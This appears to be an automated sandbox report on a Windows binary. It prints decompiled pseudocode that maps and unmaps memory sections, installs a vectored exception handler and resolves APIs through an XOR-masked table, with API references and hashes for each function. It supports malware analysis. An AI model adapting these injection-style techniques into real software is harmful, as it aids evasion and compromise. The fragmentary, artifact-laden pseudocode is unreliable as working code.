                                                                                                                                                                        							memcpy(_t13, E004031E2, 0x100);
                                                                                                                                                                        							_t16 = _t63 + 0x18; // 0x18
                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                        							if( *((intOrPtr*)(__esi + 0x10)) == _t16 &&  *((intOrPtr*)(__esi + 0x14)) == _t60) {
                                                                                                                                                                        								asm("adc ecx, ecx");
                                                                                                                                                                        								 *((intOrPtr*)(__esi + 0x10)) = _t55 + 0x18;
                                                                                                                                                                        								 *((intOrPtr*)(__esi + 0x14)) = 0;
                                                                                                                                                                        							}
                                                                                                                                                                        							if(E004012A3( *_t61, _t55, _t63,  &_v12) != 0) {
                                                                                                                                                                        								_t58 =  *0x405018;
                                                                                                                                                                        								_t62 =  *((intOrPtr*)(_t61 + 4));
                                                                                                                                                                        								_push("true");
                                                                                                                                                                        								_pop(_t48);
                                                                                                                                                                        								if(_t58 != 0) {
                                                                                                                                                                        									_t48 = RtlNtStatusToDosError( *_t58(_t62,  &_v728));
                                                                                                                                                                        								}
                                                                                                                                                                        								_v8 = _t48;
                                                                                                                                                                        								goto L13;
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				return _v8;
                                                                                                                                                                        			}



















                                                                                                                                                                        0x00402f98
                                                                                                                                                                        0x00402f98
                                                                                                                                                                        0x00402f98
                                                                                                                                                                        0x00402faa
                                                                                                                                                                        0x00402fb4
                                                                                                                                                                        0x00402fba
                                                                                                                                                                        0x00402fc5
                                                                                                                                                                        0x00402fcb
                                                                                                                                                                        0x00403095
                                                                                                                                                                        0x0040309d
                                                                                                                                                                        0x004030a8
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040309f
                                                                                                                                                                        0x0040309f
                                                                                                                                                                        0x0040309f
                                                                                                                                                                        0x00402fd1
                                                                                                                                                                        0x00402fd3
                                                                                                                                                                        0x00402fe2
                                                                                                                                                                        0x00402fe6
                                                                                                                                                                        0x004030b1
                                                                                                                                                                        0x004030b7
                                                                                                                                                                        0x00402fec
                                                                                                                                                                        0x00402ff6
                                                                                                                                                                        0x00402ffd
                                                                                                                                                                        0x00403000
                                                                                                                                                                        0x004030ab
                                                                                                                                                                        0x004030af
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403006
                                                                                                                                                                        0x0040300c
                                                                                                                                                                        0x00403010
                                                                                                                                                                        0x00403012
                                                                                                                                                                        0x0040301d
                                                                                                                                                                        0x00403023
                                                                                                                                                                        0x0040302f
                                                                                                                                                                        0x00403035
                                                                                                                                                                        0x0040303d
                                                                                                                                                                        0x00403040
                                                                                                                                                                        0x00403046
                                                                                                                                                                        0x00403056
                                                                                                                                                                        0x00403058
                                                                                                                                                                        0x0040305b
                                                                                                                                                                        0x0040305b
                                                                                                                                                                        0x0040306d
                                                                                                                                                                        0x0040306f
                                                                                                                                                                        0x00403077
                                                                                                                                                                        0x0040307a
                                                                                                                                                                        0x0040307c
                                                                                                                                                                        0x0040307d
                                                                                                                                                                        0x0040308a
                                                                                                                                                                        0x0040308a
                                                                                                                                                                        0x00403090
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00403090
                                                                                                                                                                        0x0040306d
                                                                                                                                                                        0x00403000
                                                                                                                                                                        0x00402fe6
                                                                                                                                                                        0x004030c0

                                                                                                                                                                        APIs
                                                                                                                                                                        • memset.NTDLL ref: 00402FBA
                                                                                                                                                                        • GetCalendarWeekNumber.KERNEL32(?,?,00000318,00000008), ref: 00403098
                                                                                                                                                                          • Part of subcall function 004018E5: RtlNtStatusToDosError.NTDLL ref: 0040191D
                                                                                                                                                                          • Part of subcall function 004018E5: SetLastError.KERNEL32(00000000), ref: 00401924
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000318,00000008), ref: 004030B1
                                                                                                                                                                          • Part of subcall function 00401646: RtlNtStatusToDosError.NTDLL ref: 0040165E
                                                                                                                                                                        • memcpy.NTDLL(00000218,004031E2,00000100,?,00010003,?,?,00000318,00000008), ref: 00403035
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040308A
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Error$Status$Last$CalendarNumberWeekmemcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 417590346-0
                                                                                                                                                                        • Opcode ID: 430ad605e7085fceda9ce7840f38274c23ef6bf33c3abc4e99ddae4a03f8a839
                                                                                                                                                                        • Instruction ID: ed1e5fb2af754fbc529cd80e3ce46667f67fd201a414028262d8c40079832072
                                                                                                                                                                        • Opcode Fuzzy Hash: 430ad605e7085fceda9ce7840f38274c23ef6bf33c3abc4e99ddae4a03f8a839
                                                                                                                                                                        • Instruction Fuzzy Hash: 3D318F71901209AFDB20DF65D985AABBBF8EB04304F10457FE546F3290D738AF458B55
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 80%
                                                                                                                                                                        			E00402550(void* __eax, void* __ebx) {
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        
                                                                                                                                                                        				L0:
                                                                                                                                                                        				while(1) {
                                                                                                                                                                        					asm("loopne 0x42");
                                                                                                                                                                        					 *((intOrPtr*)(__ebx + 0x7400e87d)) =  *((intOrPtr*)(__ebx + 0x7400e87d)) + __eax + 1;
                                                                                                                                                                        					if( *((intOrPtr*)(_t21 - 0x18)) == 0) {
                                                                                                                                                                        						break;
                                                                                                                                                                        					}
                                                                                                                                                                        					L3:
                                                                                                                                                                        					_push( *((intOrPtr*)(_t21 - 0x18)));
                                                                                                                                                                        				}
                                                                                                                                                                        				L5:
                                                                                                                                                                        				if( *(_t21 - 0x1c) != 0) {
                                                                                                                                                                        					memset( *(_t21 - 0x1c), 0,  *(_t21 - 0x14));
                                                                                                                                                                        					E00401759( *(_t21 - 0x1c));
                                                                                                                                                                        				}
                                                                                                                                                                        				return  *((intOrPtr*)(_t21 - 4));
                                                                                                                                                                        			}




                                                                                                                                                                        0x00402550
                                                                                                                                                                        0x00402550
                                                                                                                                                                        0x00402550
                                                                                                                                                                        0x00402553
                                                                                                                                                                        0x00402558
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040255a
                                                                                                                                                                        0x0040255a
                                                                                                                                                                        0x0040255a
                                                                                                                                                                        0x00402563
                                                                                                                                                                        0x00402567
                                                                                                                                                                        0x00402571
                                                                                                                                                                        0x0040257c
                                                                                                                                                                        0x0040257c
                                                                                                                                                                        0x00402587

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtUnmapViewOfSection.NTDLL(000000FF,00000000), ref: 00402547
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 0040254E
                                                                                                                                                                        • FindCloseChangeNotification.KERNELBASE(00000000,?,00000000), ref: 0040255D
                                                                                                                                                                        • memset.NTDLL ref: 00402571
                                                                                                                                                                        • memcpy.NTDLL(?,00405454,00000018,?,0040611E,?,004060D4,?,?,?,004024F8,?,00000000,00401B14,?,00000000), ref: 0040261B
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ChangeCloseErrorFindNotificationSectionStatusUnmapViewmemcpymemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 1928102780-0
                                                                                                                                                                        • Opcode ID: d27a42447c20540b09971236c278feefd6b6f2254b143956520aea5869f9b2f7
                                                                                                                                                                        • Instruction ID: 94ec9cae4786dc78c57028315bf82e1ce0aaff898437c032a7155da45d53ed6a
                                                                                                                                                                        • Opcode Fuzzy Hash: d27a42447c20540b09971236c278feefd6b6f2254b143956520aea5869f9b2f7
                                                                                                                                                                        • Instruction Fuzzy Hash: D7218031900641EBCB11AB65EE4AB9B7BA0FB90305F144437F115B62F2C3B95894CF5D
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 50%
                                                                                                                                                                        			E0040202A(intOrPtr _a4, void** _a8, void* _a12) {
                                                                                                                                                                        				int _v12;
                                                                                                                                                                        				void* _v20;
                                                                                                                                                                        				void* _v24;
                                                                                                                                                                        				int _v28;
                                                                                                                                                                        				int _v32;
                                                                                                                                                                        				long _v36;
                                                                                                                                                                        				int _v40;
                                                                                                                                                                        				int _v44;
                                                                                                                                                                        				void* _v48;
                                                                                                                                                                        				long _t29;
                                                                                                                                                                        				long _t33;
                                                                                                                                                                        				long _t37;
                                                                                                                                                                        				intOrPtr* _t41;
                                                                                                                                                                        				long _t45;
                                                                                                                                                                        
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				_t41 = _a12;
                                                                                                                                                                        				asm("stosd");
                                                                                                                                                                        				_v24 = _a4;
                                                                                                                                                                        				_t29 = 0x40;
                                                                                                                                                                        				_v36 = _t29;
                                                                                                                                                                        				_a12 = 0;
                                                                                                                                                                        				_v12 = 0;
                                                                                                                                                                        				_v48 = 0x18;
                                                                                                                                                                        				_v44 = 0;
                                                                                                                                                                        				_v40 = 0;
                                                                                                                                                                        				_v32 = 0;
                                                                                                                                                                        				_v28 = 0;
                                                                                                                                                                        				_t33 = NtCreateSection( &_a12, 0xf001f,  &_v48,  &_v24, _t29, 0x8000000, 0); // executed
                                                                                                                                                                        				if(_t33 < 0) {
                                                                                                                                                                        					_t45 = RtlNtStatusToDosError(_t33);
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t37 = E0040171A(_a12, 0xffffffff,  &_v12); // executed
                                                                                                                                                                        					_t45 = _t37;
                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                        						memset(_v12, 0, _v24);
                                                                                                                                                                        						 *_a8 = _v12;
                                                                                                                                                                        						if(_t41 != 0) {
                                                                                                                                                                        							 *_t41 = _a12;
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				}
                                                                                                                                                                        				if(_a12 != 0 && _t41 == 0) {
                                                                                                                                                                        					__imp__ZwClose(_a12);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t45;
                                                                                                                                                                        			}

















                                                                                                                                                                        0x00402038
                                                                                                                                                                        0x00402039
                                                                                                                                                                        0x0040203a
                                                                                                                                                                        0x0040203b
                                                                                                                                                                        0x0040203c
                                                                                                                                                                        0x0040203d
                                                                                                                                                                        0x00402049
                                                                                                                                                                        0x0040204d
                                                                                                                                                                        0x00402050
                                                                                                                                                                        0x00402058
                                                                                                                                                                        0x0040206c
                                                                                                                                                                        0x0040206f
                                                                                                                                                                        0x00402072
                                                                                                                                                                        0x00402079
                                                                                                                                                                        0x0040207c
                                                                                                                                                                        0x0040207f
                                                                                                                                                                        0x00402082
                                                                                                                                                                        0x00402085
                                                                                                                                                                        0x0040208d
                                                                                                                                                                        0x004020cc
                                                                                                                                                                        0x0040208f
                                                                                                                                                                        0x00402098
                                                                                                                                                                        0x0040209d
                                                                                                                                                                        0x004020a1
                                                                                                                                                                        0x004020aa
                                                                                                                                                                        0x004020ba
                                                                                                                                                                        0x004020bc
                                                                                                                                                                        0x004020c1
                                                                                                                                                                        0x004020c1
                                                                                                                                                                        0x004020bc
                                                                                                                                                                        0x004020a1
                                                                                                                                                                        0x004020d1
                                                                                                                                                                        0x004020da
                                                                                                                                                                        0x004020da
                                                                                                                                                                        0x004020e6

                                                                                                                                                                        APIs
                                                                                                                                                                        • NtCreateSection.NTDLL ref: 00402085
                                                                                                                                                                        • memset.NTDLL ref: 004020AA
                                                                                                                                                                        • RtlNtStatusToDosError.NTDLL ref: 004020C6
                                                                                                                                                                        • ZwClose.NTDLL(?), ref: 004020DA
                                                                                                                                                                          • Part of subcall function 0040171A: NtMapViewOfSection.NTDLL(000000FF,?,?,00000000,00000000,?,?,00000002,00000000,00000040), ref: 00401747
                                                                                                                                                                          • Part of subcall function 0040171A: RtlNtStatusToDosError.NTDLL ref: 0040174E
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: ErrorSectionStatus$CloseCreateViewmemset
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 783833395-0
                                                                                                                                                                        • Opcode ID: 278b6d2b9847d7454f3808baa84b8071cf5c4a666db4d29bd2ab9391a81b9f03
                                                                                                                                                                        • Instruction ID: 132a9c8b6affafc7a110b6cde528536837f2270e12e6eda6991060347756c9fd
                                                                                                                                                                        • Opcode Fuzzy Hash: 278b6d2b9847d7454f3808baa84b8071cf5c4a666db4d29bd2ab9391a81b9f03
                                                                                                                                                                        • Instruction Fuzzy Hash: 65214CB5910219AFCB11CFA8CD449EF7BB9EB48750F104426FA11F3290D7B09A54CBA5
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 74%
                                                                                                                                                                        			E00402F32(void* __ebx, void* __edx, void* __eflags) {
                                                                                                                                                                        				void* __esi;
                                                                                                                                                                        				void* _t5;
                                                                                                                                                                        				intOrPtr* _t8;
                                                                                                                                                                        				long _t9;
                                                                                                                                                                        				long _t14;
                                                                                                                                                                        				struct _CRITICAL_SECTION* _t15;
                                                                                                                                                                        
                                                                                                                                                                        				_push(0x28);
                                                                                                                                                                        				_t15 = E004017EF(_t5, __ebx, __eflags);
                                                                                                                                                                        				if(_t15 == 0) {
                                                                                                                                                                        					_t14 = 8;
                                                                                                                                                                        					L7:
                                                                                                                                                                        					return _t14;
                                                                                                                                                                        				}
                                                                                                                                                                        				_t1 = _t15 + 0x18; // 0x18
                                                                                                                                                                        				_t8 = _t1;
                                                                                                                                                                        				 *((intOrPtr*)(_t15 + 0x1c)) = _t8;
                                                                                                                                                                        				 *_t8 = _t8;
                                                                                                                                                                        				InitializeCriticalSection(_t15);
                                                                                                                                                                        				_t9 = TlsAlloc();
                                                                                                                                                                        				 *(_t15 + 0x24) = _t9;
                                                                                                                                                                        				if(_t9 == 0xffffffff) {
                                                                                                                                                                        					L4:
                                                                                                                                                                        					_t14 = GetLastError();
                                                                                                                                                                        					__eflags = _t14;
                                                                                                                                                                        					if(_t14 != 0) {
                                                                                                                                                                        						E004015D2(_t15, _t15);
                                                                                                                                                                        					}
                                                                                                                                                                        					goto L7;
                                                                                                                                                                        				}
                                                                                                                                                                        				__imp__AddVectoredExceptionHandler(1, E00401E7C); // executed
                                                                                                                                                                        				 *(_t15 + 0x20) = _t9;
                                                                                                                                                                        				if(_t9 == 0) {
                                                                                                                                                                        					goto L4;
                                                                                                                                                                        				}
                                                                                                                                                                        				 *0x4054c4 = _t15;
                                                                                                                                                                        				_t14 = 0;
                                                                                                                                                                        				goto L7;
                                                                                                                                                                        			}









                                                                                                                                                                        0x00402f34
                                                                                                                                                                        0x00402f3b
                                                                                                                                                                        0x00402f3f
                                                                                                                                                                        0x00402f92
                                                                                                                                                                        0x00402f93
                                                                                                                                                                        0x00402f97
                                                                                                                                                                        0x00402f97
                                                                                                                                                                        0x00402f41
                                                                                                                                                                        0x00402f41
                                                                                                                                                                        0x00402f45
                                                                                                                                                                        0x00402f48
                                                                                                                                                                        0x00402f4a
                                                                                                                                                                        0x00402f50
                                                                                                                                                                        0x00402f59
                                                                                                                                                                        0x00402f5c
                                                                                                                                                                        0x00402f7c
                                                                                                                                                                        0x00402f82
                                                                                                                                                                        0x00402f84
                                                                                                                                                                        0x00402f86
                                                                                                                                                                        0x00402f89
                                                                                                                                                                        0x00402f89
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402f86
                                                                                                                                                                        0x00402f65
                                                                                                                                                                        0x00402f6d
                                                                                                                                                                        0x00402f70
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402f72
                                                                                                                                                                        0x00402f78
                                                                                                                                                                        0x00000000

                                                                                                                                                                        APIs
                                                                                                                                                                          • Part of subcall function 004017EF: HeapAlloc.KERNEL32(00000000,?,00402F3B,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 004017FB
                                                                                                                                                                        • InitializeCriticalSection.KERNEL32(00000000,00000028,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 00402F4A
                                                                                                                                                                        • TlsAlloc.KERNEL32(?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 00402F50
                                                                                                                                                                        • RtlAddVectoredExceptionHandler.NTDLL(00000001,00401E7C,?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 00402F65
                                                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00401829,?,00000000,?,?,004019A4,?,00000000), ref: 00402F7C
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: Alloc$CriticalErrorExceptionHandlerHeapInitializeLastSectionVectored
                                                                                                                                                                        • String ID:
                                                                                                                                                                        • API String ID: 628750512-0
                                                                                                                                                                        • Opcode ID: 4f24cbbfb65dcb78753e3ac96d2e18a667806db2ee6b67c77e373a3283d37c7f
                                                                                                                                                                        • Instruction ID: 94f9f684659f09da9abd5f2b4159ddb8b869c631310bd1cd4650bd78252f59ca
                                                                                                                                                                        • Opcode Fuzzy Hash: 4f24cbbfb65dcb78753e3ac96d2e18a667806db2ee6b67c77e373a3283d37c7f
                                                                                                                                                                        • Instruction Fuzzy Hash: 19F0A471500B124FC3206F3A9A086477AF5ABC4750B10023BE215F62E0DBB4C4059769
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 79%
                                                                                                                                                                        			E004020E9(signed int __edx, void* _a4) {
                                                                                                                                                                        				void* __edi;
                                                                                                                                                                        				struct HINSTANCE__* _t4;
                                                                                                                                                                        				signed int _t6;
                                                                                                                                                                        				signed int _t8;
                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                        				void* _t17;
                                                                                                                                                                        				void* _t18;
                                                                                                                                                                        				signed int _t19;
                                                                                                                                                                        				void* _t21;
                                                                                                                                                                        
                                                                                                                                                                        				_t19 = __edx;
                                                                                                                                                                        				_t21 = 0;
                                                                                                                                                                        				if(( *0x40543c |  *0x405440) == 0 || ( *0x405444 |  *0x405448) == 0 || ( *0x40544c |  *0x405450) == 0) {
                                                                                                                                                                        					_push("true");
                                                                                                                                                                        					_pop(_t21);
                                                                                                                                                                        					_t4 = GetModuleHandleA(0x406000); // executed
                                                                                                                                                                        					_t20 = _t4;
                                                                                                                                                                        					_t27 = _t4;
                                                                                                                                                                        					if(_t4 != 0) {
                                                                                                                                                                        						_t6 = E00401667(_t17, _t18, _t19, _t20, _t27, "true"); // executed
                                                                                                                                                                        						asm("cdq");
                                                                                                                                                                        						 *0x40543c = _t6;
                                                                                                                                                                        						_t28 = _t6 | _t19;
                                                                                                                                                                        						 *0x405440 = _t19;
                                                                                                                                                                        						if((_t6 | _t19) != 0) {
                                                                                                                                                                        							_t8 = E00401667(_t17, _t18, _t19, _t20, _t28, 0x4060d4); // executed
                                                                                                                                                                        							asm("cdq");
                                                                                                                                                                        							 *0x405444 = _t8;
                                                                                                                                                                        							_t29 = _t8 | _t19;
                                                                                                                                                                        							 *0x405448 = _t19;
                                                                                                                                                                        							if((_t8 | _t19) != 0) {
                                                                                                                                                                        								_t10 = E00401667(_t17, _t18, _t19, _t20, _t29, 0x40611e); // executed
                                                                                                                                                                        								asm("cdq");
                                                                                                                                                                        								 *0x40544c = _t10;
                                                                                                                                                                        								 *0x405450 = _t19;
                                                                                                                                                                        								if((_t10 | _t19) != 0) {
                                                                                                                                                                        									_t21 = 0;
                                                                                                                                                                        									goto L8;
                                                                                                                                                                        								}
                                                                                                                                                                        							}
                                                                                                                                                                        						}
                                                                                                                                                                        					}
                                                                                                                                                                        				} else {
                                                                                                                                                                        					L8:
                                                                                                                                                                        					memcpy(_a4, "@x�w", 0x18);
                                                                                                                                                                        				}
                                                                                                                                                                        				return _t21;
                                                                                                                                                                        			}












                                                                                                                                                                        0x004020e9
                                                                                                                                                                        0x004020ef
                                                                                                                                                                        0x004020f8
                                                                                                                                                                        0x00402114
                                                                                                                                                                        0x00402116
                                                                                                                                                                        0x0040211c
                                                                                                                                                                        0x00402122
                                                                                                                                                                        0x00402124
                                                                                                                                                                        0x00402126
                                                                                                                                                                        0x0040212d
                                                                                                                                                                        0x00402132
                                                                                                                                                                        0x00402133
                                                                                                                                                                        0x00402138
                                                                                                                                                                        0x0040213a
                                                                                                                                                                        0x00402140
                                                                                                                                                                        0x00402147
                                                                                                                                                                        0x0040214c
                                                                                                                                                                        0x0040214d
                                                                                                                                                                        0x00402152
                                                                                                                                                                        0x00402154
                                                                                                                                                                        0x0040215a
                                                                                                                                                                        0x00402161
                                                                                                                                                                        0x00402166
                                                                                                                                                                        0x00402167
                                                                                                                                                                        0x0040216e
                                                                                                                                                                        0x00402174
                                                                                                                                                                        0x00402176
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00402176
                                                                                                                                                                        0x00402174
                                                                                                                                                                        0x0040215a
                                                                                                                                                                        0x00402140
                                                                                                                                                                        0x00402178
                                                                                                                                                                        0x00402178
                                                                                                                                                                        0x00402183
                                                                                                                                                                        0x00402188
                                                                                                                                                                        0x0040218f

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNELBASE(00406000,?,?,00402500,?,00401B14,?,00000000), ref: 0040211C
                                                                                                                                                                        • memcpy.NTDLL(?,@xw,00000018,0040611E,004060D4,?), ref: 00402183
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModulememcpy
                                                                                                                                                                        • String ID: @xw
                                                                                                                                                                        • API String ID: 1801490239-2821512424
                                                                                                                                                                        • Opcode ID: 0cb2d4f22ab39955a1558cd501437ab96a023d1de6e3644a1f9ff1be46b80452
                                                                                                                                                                        • Instruction ID: 389c99753ed0c14ec7fc9ccb6a39992c9750a91ea15409a2bafa9b3af4485a95
                                                                                                                                                                        • Opcode Fuzzy Hash: 0cb2d4f22ab39955a1558cd501437ab96a023d1de6e3644a1f9ff1be46b80452
                                                                                                                                                                        • Instruction Fuzzy Hash: 3501B97168090167C720EB65EE46B8777A0E79470E7154537F604FB2F2D27558808F3E
                                                                                                                                                                        Uniqueness

                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                        			E00401873() {
                                                                                                                                                                        				struct HINSTANCE__* _t3;
                                                                                                                                                                        				struct HINSTANCE__* _t5;
                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                        				struct HINSTANCE__* _t8;
                                                                                                                                                                        				struct HINSTANCE__* _t9;
                                                                                                                                                                        				signed int _t10;
                                                                                                                                                                        				signed int _t12;
                                                                                                                                                                        
                                                                                                                                                                        				_t3 = GetModuleHandleA(0x406000); // executed
                                                                                                                                                                        				 *0x4054bc = _t3;
                                                                                                                                                                        				if(_t3 == 0) {
                                                                                                                                                                        					_push(0x7e);
                                                                                                                                                                        					goto L9;
                                                                                                                                                                        				} else {
                                                                                                                                                                        					_t5 = GetModuleHandleA(0x406016); // executed
                                                                                                                                                                        					 *0x4054c0 = _t5;
                                                                                                                                                                        					_t10 = 0;
                                                                                                                                                                        					while(1) {
                                                                                                                                                                        						_t7 =  *(_t10 + 0x405014) ^  *0x405490;
                                                                                                                                                                        						_t9 =  *0x4054bc; // 0x77df0000
                                                                                                                                                                        						_push(_t7);
                                                                                                                                                                        						_t12 = 0;
                                                                                                                                                                        						_push(0);
                                                                                                                                                                        						_push(_t9);
                                                                                                                                                                        						_t8 = _t9;
                                                                                                                                                                        						"j,hHA@"();
                                                                                                                                                                        						if(_t7 != 0) {
                                                                                                                                                                        							_t12 =  *_t7 + _t8;
                                                                                                                                                                        						}
                                                                                                                                                                        						 *(_t10 + 0x405014) = _t12;
                                                                                                                                                                        						if(_t12 == 0) {
                                                                                                                                                                        							break;
                                                                                                                                                                        						}
                                                                                                                                                                        						_t10 = _t10 + 4;
                                                                                                                                                                        						if(_t10 < 0x14) {
                                                                                                                                                                        							continue;
                                                                                                                                                                        						} else {
                                                                                                                                                                        						}
                                                                                                                                                                        						goto L10;
                                                                                                                                                                        					}
                                                                                                                                                                        					_push("true");
                                                                                                                                                                        					L9:
                                                                                                                                                                        					_pop(0);
                                                                                                                                                                        				}
                                                                                                                                                                        				L10:
                                                                                                                                                                        				return 0;
                                                                                                                                                                        			}










                                                                                                                                                                        0x00401884
                                                                                                                                                                        0x00401888
                                                                                                                                                                        0x0040188d
                                                                                                                                                                        0x004018db
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x0040188f
                                                                                                                                                                        0x00401894
                                                                                                                                                                        0x00401896
                                                                                                                                                                        0x0040189b
                                                                                                                                                                        0x0040189d
                                                                                                                                                                        0x004018a3
                                                                                                                                                                        0x004018a9
                                                                                                                                                                        0x004018af
                                                                                                                                                                        0x004018b0
                                                                                                                                                                        0x004018b2
                                                                                                                                                                        0x004018b3
                                                                                                                                                                        0x004018b4
                                                                                                                                                                        0x004018b6
                                                                                                                                                                        0x004018bd
                                                                                                                                                                        0x004018c1
                                                                                                                                                                        0x004018c1
                                                                                                                                                                        0x004018c5
                                                                                                                                                                        0x004018cb
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004018cd
                                                                                                                                                                        0x004018d3
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004018d5
                                                                                                                                                                        0x00000000
                                                                                                                                                                        0x004018d3
                                                                                                                                                                        0x004018d7
                                                                                                                                                                        0x004018dd
                                                                                                                                                                        0x004018dd
                                                                                                                                                                        0x004018dd
                                                                                                                                                                        0x004018e0
                                                                                                                                                                        0x004018e4

                                                                                                                                                                        APIs
                                                                                                                                                                        • GetModuleHandleA.KERNELBASE(00406000,?,00000000,?,?,004019C4,?,00000000), ref: 00401884
                                                                                                                                                                        • GetModuleHandleA.KERNELBASE(00406016,?,00000000,?,?,004019C4,?,00000000), ref: 00401894
                                                                                                                                                                        Strings
                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                        • Source File: 00000001.00000002.428863492.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                        • Associated: 00000001.00000002.428854553.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428878667.0000000000404000.00000002.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428951414.0000000000405000.00000004.00020000.sdmp Download File
                                                                                                                                                                        • Associated: 00000001.00000002.428963007.0000000000408000.00000002.00020000.sdmp Download File
                                                                                                                                                                        Similarity
                                                                                                                                                                        • API ID: HandleModule
                                                                                                                                                                        • String ID: pnls
